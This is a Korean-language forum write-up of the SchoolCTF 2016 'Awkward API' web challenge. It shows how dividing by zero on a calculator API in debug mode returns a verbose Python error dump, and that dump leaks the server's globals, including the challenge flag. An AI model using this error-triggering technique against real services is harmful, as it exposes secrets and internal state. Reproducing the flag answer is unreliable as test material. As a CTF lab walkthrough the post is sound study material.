[SchoolCTF 2016] (web 400) Awkward API

해킹대회 문제 풀이 연습장소

Moderator: amesianx

Post Reply
User avatar
Posts: 132
Joined: Wed Oct 14, 2015 2:54 pm

[SchoolCTF 2016] (web 400) Awkward API

Post by SinJiRu » Wed Nov 09, 2016 6:30 pm


램프든 아저씨가 나옵니다 ..
main.png (284.19 KiB) Viewed 680 times
Note: API is in debug mode now! The only supported query is '<number> [+-*/] <number>'
사칙연산을 대신 해주는 API를 사용하고 있는듯 하군요

테스트를 해보겠습니다
test.png (234.04 KiB) Viewed 680 times
1 + 1 를 넣어주니
Great! That is your result 2.000000
라며 바른 값을 가져오는군요

일단 프록시를 잡으면
query.png (34.79 KiB) Viewed 680 times
아무런 리스폰이 오지가 않습니다 ...

Reepeater 기능을 이용하면 리스폰이 오는걸 알게되었습니다
Repeater.png (47.93 KiB) Viewed 680 times
Repeater-1.png (61.98 KiB) Viewed 680 times
사칙연산에서 옳은 값이 아닌 값이 나오게 하려면....

0으로 나눠 본다면 어떨까요?
error.png (147.16 KiB) Viewed 680 times
Got unknown exception float division by zero.
에러 메세지가 뜨네요
error-1.png (71.67 KiB) Viewed 680 times
뭔가 많은 글이 뜹니다...

Code: Select all

HTTP/1.1 200 OK
Server: nginx/1.4.6 (Ubuntu)
Date: Wed, 09 Nov 2016 09:19:34 GMT
Content-Type: application/json
Content-Length: 7833
Connection: keep-alive

{"error":"Got unknown exception float division by zero.","exception_type":"ZeroDivisionError","exception_value":"ZeroDivisionError('float division by zero',)","file":"main.py","globals":"{'MATH_RE': <_sre.SRE_Pattern object at 0x7f40ef84bda0>, 'traceback': <module 'traceback' from '/usr/lib/python2.7/traceback.pyc'>, 'Flask': <class 'flask.app.Flask'>, 'app': <Flask 'main'>, 'TimeoutException': <class 'main.TimeoutException'>, 'operator': <module 'operator' (built-in)>, 'home': <function home at 0x7f40eeec98c0>, 'render_template': <function render_template at 0x7f40eeeb5848>, 'OPERATORS': {'+': <built-in function add>, '*': <built-in function mul>, '-': <built-in function sub>, '/': <built-in function div>}, '__package__': None, 're': <module 're' from '/usr/lib/python2.7/re.pyc'>, 'calc': <function calc at 0x7f40eeec9a28>, '__doc__': None, '__builtins__': {'bytearray': <type 'bytearray'>, 'IndexError': <type 'exceptions.IndexError'>, 'all': <built-in function all>, 'help': Type help() for interactive help, or help(object) for help about object., 'vars': <built-in function vars>, 'SyntaxError': <type 'exceptions.SyntaxError'>, 'unicode': <type 'unicode'>, 'UnicodeDecodeError': <type 'exceptions.UnicodeDecodeError'>, 'memoryview': <type 'memoryview'>, 'isinstance': <built-in function isinstance>, 'copyright': Copyright (c) 2001-2014 Python Software Foundation.\nAll Rights Reserved.\n\nCopyright (c) 2000 BeOpen.com.\nAll Rights Reserved.\n\nCopyright (c) 1995-2001 Corporation for National Research Initiatives.\nAll Rights Reserved.\n\nCopyright (c) 1991-1995 Stichting Mathematisch Centrum, Amsterdam.\nAll Rights Reserved., 'NameError': <type 'exceptions.NameError'>, 'BytesWarning': <type 'exceptions.BytesWarning'>, 'dict': <type 'dict'>, 'input': <built-in function input>, 'oct': <built-in function oct>, 'bin': <built-in function bin>, 'SystemExit': <type 'exceptions.SystemExit'>, 'StandardError': <type 'exceptions.StandardError'>, 'format': <built-in function format>, 'repr': <built-in function repr>, 'sorted': <built-in function sorted>, 'False': False, 'RuntimeWarning': <type 'exceptions.RuntimeWarning'>, 'list': <type 'list'>, 'iter': <built-in function iter>, 'reload': <built-in function reload>, 'Warning': <type 'exceptions.Warning'>, '__package__': None, 'round': <built-in function round>, 'dir': <built-in function dir>, 'cmp': <built-in function cmp>, 'set': <type 'set'>, 'bytes': <type 'str'>, 'reduce': <built-in function reduce>, 'intern': <built-in function intern>, 'issubclass': <built-in function issubclass>, 'Ellipsis': Ellipsis, 'EOFError': <type 'exceptions.EOFError'>, 'locals': <built-in function locals>, 'BufferError': <type 'exceptions.BufferError'>, 'slice': <type 'slice'>, 'FloatingPointError': <type 'exceptions.FloatingPointError'>, 'sum': <built-in function sum>, 'getattr': <built-in function getattr>, 'abs': <built-in function abs>, 'exit': Use exit() or Ctrl-D (i.e. EOF) to exit, 'print': <built-in function print>, 'True': True, 'FutureWarning': <type 'exceptions.FutureWarning'>, 'ImportWarning': <type 'exceptions.ImportWarning'>, 'None': None, 'hash': <built-in function hash>, 'ReferenceError': <type 'exceptions.ReferenceError'>, 'len': <built-in function len>, 'credits':     Thanks to CWI, CNRI, BeOpen.com, Zope Corporation and a cast of thousands\n    for supporting Python development.  See www.python.org for more information., 'frozenset': <type 'frozenset'>, '__name__': '__builtin__', 'ord': <built-in function ord>, 'super': <type 'super'>, 'TypeError': <type 'exceptions.TypeError'>, 'license': Type license() to see the full license text, 'KeyboardInterrupt': <type 'exceptions.KeyboardInterrupt'>, 'UserWarning': <type 'exceptions.UserWarning'>, 'filter': <built-in function filter>, 'range': <built-in function range>, 'staticmethod': <type 'staticmethod'>, 'SystemError': <type 'exceptions.SystemError'>, 'BaseException': <type 'exceptions.BaseException'>, 'pow': <built-in function pow>, 'RuntimeError': <type 'exceptions.RuntimeError'>, 'float': <type 'float'>, 'MemoryError': <type 'exceptions.MemoryError'>, 'StopIteration': <type 'exceptions.StopIteration'>, 'globals': <built-in function globals>, 'divmod': <built-in function divmod>, 'enumerate': <type 'enumerate'>, 'apply': <built-in function apply>, 'LookupError': <type 'exceptions.LookupError'>, 'open': <built-in function open>, 'quit': Use quit() or Ctrl-D (i.e. EOF) to exit, 'basestring': <type 'basestring'>, 'UnicodeError': <type 'exceptions.UnicodeError'>, 'zip': <built-in function zip>, 'hex': <built-in function hex>, 'long': <type 'long'>, 'next': <built-in function next>, 'ImportError': <type 'exceptions.ImportError'>, 'chr': <built-in function chr>, 'xrange': <type 'xrange'>, 'type': <type 'type'>, '__doc__': \"Built-in functions, exceptions, and other objects.\\n\\nNoteworthy: None is the `nil' object; Ellipsis represents `...' in slices.\", 'Exception': <type 'exceptions.Exception'>, 'tuple': <type 'tuple'>, 'UnicodeTranslateError': <type 'exceptions.UnicodeTranslateError'>, 'reversed': <type 'reversed'>, 'UnicodeEncodeError': <type 'exceptions.UnicodeEncodeError'>, 'IOError': <type 'exceptions.IOError'>, 'hasattr': <built-in function hasattr>, 'delattr': <built-in function delattr>, 'setattr': <built-in function setattr>, 'raw_input': <built-in function raw_input>, 'SyntaxWarning': <type 'exceptions.SyntaxWarning'>, 'compile': <built-in function compile>, 'ArithmeticError': <type 'exceptions.ArithmeticError'>, 'str': <type 'str'>, 'property': <type 'property'>, 'GeneratorExit': <type 'exceptions.GeneratorExit'>, 'int': <type 'int'>, '__import__': <built-in function __import__>, 'KeyError': <type 'exceptions.KeyError'>, 'coerce': <built-in function coerce>, 'PendingDeprecationWarning': <type 'exceptions.PendingDeprecationWarning'>, 'file': <type 'file'>, 'EnvironmentError': <type 'exceptions.EnvironmentError'>, 'unichr': <built-in function unichr>, 'id': <built-in function id>, 'OSError': <type 'exceptions.OSError'>, 'DeprecationWarning': <type 'exceptions.DeprecationWarning'>, 'min': <built-in function min>, 'UnicodeWarning': <type 'exceptions.UnicodeWarning'>, 'execfile': <built-in function execfile>, 'any': <built-in function any>, 'complex': <type 'complex'>, 'bool': <type 'bool'>, 'ValueError': <type 'exceptions.ValueError'>, 'NotImplemented': NotImplemented, 'map': <built-in function map>, 'buffer': <type 'buffer'>, 'max': <built-in function max>, 'object': <type 'object'>, 'TabError': <type 'exceptions.TabError'>, 'callable': <built-in function callable>, 'ZeroDivisionError': <type 'exceptions.ZeroDivisionError'>, 'eval': <built-in function eval>, '__debug__': True, 'IndentationError': <type 'exceptions.IndentationError'>, 'AssertionError': <type 'exceptions.AssertionError'>, 'classmethod': <type 'classmethod'>, 'UnboundLocalError': <type 'exceptions.UnboundLocalError'>, 'NotImplementedError': <type 'exceptions.NotImplementedError'>, 'AttributeError': <type 'exceptions.AttributeError'>, 'OverflowError': <type 'exceptions.OverflowError'>}, '__file__': './main.py', 'sys': <module 'sys' (built-in)>, 'FLAG': 'u$r_wi11_n3V3r_C_i7_@nyW@y', '__name__': 'main', 'wait': <function wait at 0x7f40eeebf8c0>, 'Process': <class 'multiprocessing.process.Process'>, 'jsonify': <function jsonify at 0x7f40eef32f50>, 'request': <Request 'http://awkward.task.school-ctf.org/api/v01/calculate' [POST]>, 'time': <module 'time' (built-in)>, 'MAXTIME': 2, 'os': <module 'os' from '/usr/lib/python2.7/os.pyc'>}","locals":"{'e': ZeroDivisionError('float division by zero',), 'a1': 3.0, 'a2': 0.0, 'timeout': <Process(Process-694, started)>, 'query': u'3 / 0', 're_res': <_sre.SRE_Match object at 0x7f40eeea9880>, 'op': <built-in function div>}","traceback":["  File \"./main.py\", line 57, in calc\n    res = op(a1, a2)\n"]}
좀더 보기 편하게 바꾸면..
error-2.png (193.29 KiB) Viewed 680 times
대충 error의 종류
{"error":"Got unknown exception float division by zero.","exception_type":"ZeroDivisionError","exception_value":"ZeroDivisionError('float division by zero',)"

와 참조 형식이 나오는듯 하군요 밑에 Flag가 붙어있습니다
flag.png (35.21 KiB) Viewed 680 times
'FLAG': 'u$r_wi11_n3V3r_C_i7_@nyW@y'
이대로 등록하면 안되고

형식에 맞게
바꿔주면 클리어>.<

Post Reply

Who is online

Users browsing this forum: No registered users and 1 guest